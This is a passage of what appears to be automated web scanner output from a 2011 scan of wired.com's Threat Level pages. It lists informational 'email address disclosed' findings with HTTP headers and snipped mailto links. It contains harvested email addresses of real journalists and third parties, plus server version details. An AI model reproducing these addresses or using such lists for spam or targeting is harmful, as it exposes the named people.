Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/dubai-assassination/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.41. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/secret-tanning-camera/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.42. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/vf-wikieaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.43. http://www.wired.com/threatlevel/2011/01/video-poker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/video-poker/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.44. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:30 +0000
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:06 GMT
Date: Wed, 12 Jan 2011 15:27:06 GMT
Content-Length: 56148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.46. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:29 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=386
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:27:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.47. http://www.wired.com/threatlevel/author/kimzetter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/author/kimzetter/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=331
Expires: Wed, 12 Jan 2011 15:33:34 GMT
Date: Wed, 12 Jan 2011 15:28:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.48. http://www.wired.com/threatlevel/category/announcements/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/announcements/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=313
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.49. http://www.wired.com/threatlevel/category/atm-hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/atm-hacking/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:09:34 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=310
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.50. http://www.wired.com/threatlevel/category/bittorrent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bittorrent/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=308
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.51. http://www.wired.com/threatlevel/category/black-hat-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/black-hat-conference/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=302
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.52. http://www.wired.com/threatlevel/category/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bradley-manning/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=257
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.53. http://www.wired.com/threatlevel/category/breaches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/breaches/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kzetter@wired.com
msoaresds@uol.com.br
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:33 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=260
Expires: Wed, 12 Jan 2011 15:32:57 GMT
Date: Wed, 12 Jan 2011 15:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:msoaresds@uol.com.br">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.54. http://www.wired.com/threatlevel/category/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/censorship/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:10:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=298
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.55. http://www.wired.com/threatlevel/category/chaos-computer-club/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/chaos-computer-club/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.56. http://www.wired.com/threatlevel/category/conferences/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/conferences/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
paul_fisher@condenast.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:28:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:paul_fisher@condenast.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.57. http://www.wired.com/threatlevel/category/copyrights-and-patents/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/copyrights-and-patents/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=278
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.58. http://www.wired.com/threatlevel/category/coverups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/coverups/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:33:07 GMT
Date: Wed, 12 Jan 2011 15:29:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
